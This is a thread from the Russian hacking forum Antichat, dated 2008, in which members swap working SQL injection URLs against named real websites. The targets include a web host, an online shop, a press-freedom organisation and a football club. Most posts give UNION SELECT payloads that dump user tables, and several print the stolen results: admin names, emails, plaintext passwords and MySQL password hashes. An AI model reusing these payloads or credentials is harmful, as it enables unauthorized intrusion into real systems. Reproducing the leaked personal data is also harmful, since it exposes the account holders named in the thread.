HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 19.02.2008, 13:30
Lamersha
Новичок
Регистрация: 11.12.2007
Сообщений: 6
С нами: 9692619

Репутация: 14
По умолчанию

http://www.line-age.ru/statistics.php?show_page=show_clan_info&indx=10080 '
 
Ответить с цитированием

  #2  
Старый 19.02.2008, 15:24
x88x
Участник форума
Регистрация: 27.11.2007
Сообщений: 233
С нами: 9713126

Репутация: 378
По умолчанию

хостерЖ
elabhosting.com
Код:
http://www.elabhosting.com/subtopic.php?id=99999'+union+select+1,AES_DECRYPT(AES_ENCRYPT(password,0x71),0x71),3,4+from+users+limit+1,1/*
Таблицы и поля, которые я подобрал:
Код HTML:
users
  email
  password
  first_name
  last_name
domains
server
  id
  name
А вот и адимн:

First Name: Wael
Last Name: Elkadi
pass: william
admin@elabhosting.com
 
Ответить с цитированием

  #3  
Старый 19.02.2008, 15:31
x88x
Участник форума
Регистрация: 27.11.2007
Сообщений: 233
С нами: 9713126

Репутация: 378
По умолчанию

да, чуть не забыл =)
буржуйский онлайн-магазинчик (австралийский)

Код:
_http://www.australianopenshop.com/category.php?id=99999+union+select+1,2,3,4,5,6,7,8,9,10,VERSION(),12/*
Версия мускула: 5.0.27-community-nt
Юзер: ausopen@netregis-8cuqdh
База: ausopen


смотрел таблицы, из достойных могу выделить только:
tblbilling
tblmember
tblorder
tblorderprod
tblsiteadmin
tbluser
 
Ответить с цитированием

  #4  
Старый 19.02.2008, 19:19
159932
Постоянный
Регистрация: 28.09.2007
Сообщений: 820
С нами: 9799586

Репутация: 1385


По умолчанию

moblog.co.uk
Цитата:
http://moblog.co.uk/view.php?id=-77571+union+select+1,2,3,4,5,6,7,8,9,0,1,2,concat_ ws(0x3a,username,password,email),4,5,6,7,8,9,0,1,2 ,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7 ,8,9+from+mob_users+limit+5110,1/*
http://moblog.co.uk/forum
от форума
mat:bigmoney
 
Ответить с цитированием

  #5  
Старый 19.02.2008, 21:29
Nea7
Участник форума
Регистрация: 08.09.2007
Сообщений: 211
С нами: 9828237

Репутация: 778
По умолчанию

Цитата:
Сообщение от 159932  
moblog.co.uk

http://moblog.co.uk/forum
от форума
mat:bigmoney
баян =D
Код:
http://www.legal-info-legale.nb.ca/showpub.asp?id=(select+top+1+cast(username+as+nvarchar)%2B%27%3A%27%2Bcast(password+as+nvarchar)+from+users)--
'pleisadmin:s09ofk48f'
два раза вводить.
 
Ответить с цитированием

  #6  
Старый 19.02.2008, 21:09
Sleep
Участник форума
Регистрация: 31.10.2007
Сообщений: 193
С нами: 9752260

Репутация: 150
Post

4.0.27-standard
Код HTML:
http://www.plantgeek.net/article_viewer.php?id=99999999999999+union+select+1,2,concat(version(),database(),user()),4,5,6,7,8,9,1,2,3/*
4.1.22-log
Код HTML:
http://www.valleys.ru/work.php?id=-9+union+select+1,2,database(),user(),5,6,version(),8,9--
4.1.20-max-log
Код HTML:
http://www.freepoc.org/viewapp.php?id=-1+union+select+1,version(),3,4,5,6,7,user()--
Код HTML:
http://www.rabidhardware.net/index.php?profile=1'+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,TABLE_NAME,7,8,9,0,1,2,3,4,5,6+FROM+INFORMATION_SCHEMA.TABLES/*

Последний раз редактировалось Sleep; 19.02.2008 в 21:13..
 
Ответить с цитированием

  #7  
Старый 20.02.2008, 00:08
Jokester
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
С нами: 9593606

Репутация: 4915


По умолчанию

СПРАВИЗДАТ - ЖЕЛТЫЕ СТРАНИЦЫ

_http://www.spr.ru/view.php?id_firm=-22775'+union+select+1,concat(user,char(58),passwor d),3+from+mysql.user+limit+0,1/*

spraviz8_sam:*26F07D3B38B5FAC4BA063A5D76D2895C7331 9D78
 
Ответить с цитированием

  #8  
Старый 20.02.2008, 00:38
CaNNabi$
Познающий
Регистрация: 21.01.2008
Сообщений: 85
С нами: 9633635

Репутация: 338
По умолчанию

www.resheto.ru
Код:
http://resheto.ru/photo/index.php?id=0x2d3127%20union+select+1,2,3/*
5.0.32-Debian_7etch1-log/resheto/resheto@ftp01.awax-hosting.ru
по рейтингу на маил в сотке)

Код:
http://thefamilyrecords.com/artists.php?artists_id=0x2d3127%20union+select+1,concat_ws(0x2F,version(),database(),user()),3,4,5,6,7/*
5.0.24a-standard-log/family_records/family_records@apache2-twiddle.galaga.dreamhost.com

-------------------------------------------------------------
jokester просто красавчег) нету слов до сих пор в оуте)
 
Ответить с цитированием

  #9  
Старый 20.02.2008, 01:34
Климент_Ворошилов
Новичок
Регистрация: 08.12.2007
Сообщений: 21
С нами: 9697759

Репутация: 36
По умолчанию

Официальный сайт футбольного клуба "Металлург" Запорожье.
http://www.fcmetalurg.com/club/about_team.php?tid=-5+union+select+passwd,2,3,login,5,6,7,8,9,0,1,2,3, 4,5,6,7,8,9+from+users/*

4.0.27-sta

Модератор-админ на форуме - Fidel:tura
 
Ответить с цитированием

  #10  
Старый 20.02.2008, 02:08
Momiji
Постоянный
Регистрация: 25.08.2007
Сообщений: 530
С нами: 9847919

Репутация: 1446


По умолчанию

wan-press.org
Код:
http://www.wan-press.org/nie/resourcescontents.php?id=-1+union+select+1,2,3,concat_ws(0x3,version(),user(),database())/*
5.0.32-Debian_7etch1-logroot@localhostnewwan
Код:
http://www.wan-press.org/nie/resourcescontents.php?id=-1+union+select+1,2,3,concat(user,0x3,password)+from+mysql.user/*
Код:
debian-sys-maint:679ee92a1e5d19c1
pma_9HPasvZaPmz0:090e15576d4d4bd5
horde:1dedb445714a68b0
sitebuilder_db:1e4b1f810b9f14b8
rap21:521c428865968727
capetown2007:521c428865968727
pressfreedom:521c428865968727
conference:521c428865968727
newsletter:521c428865968727
newwan:521c428865968727
wan:521c428865968727
wdmt:521c428865968727
wef:521c428865968727
wpt:521c428865968727
root:521c428865968727
xmltospip:
tablemountain:521c428865968727
goteborg2008:18788a6d194a1517
admin:13ba13aa099ab4ac
Таблица с юзерами: front_users
Колонки: fuser_login, fuser_passwd, fuser_email
Не смог найти базу в которой эта таблица, через схему вывести не получилось, сцуко скрипт не дает.
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.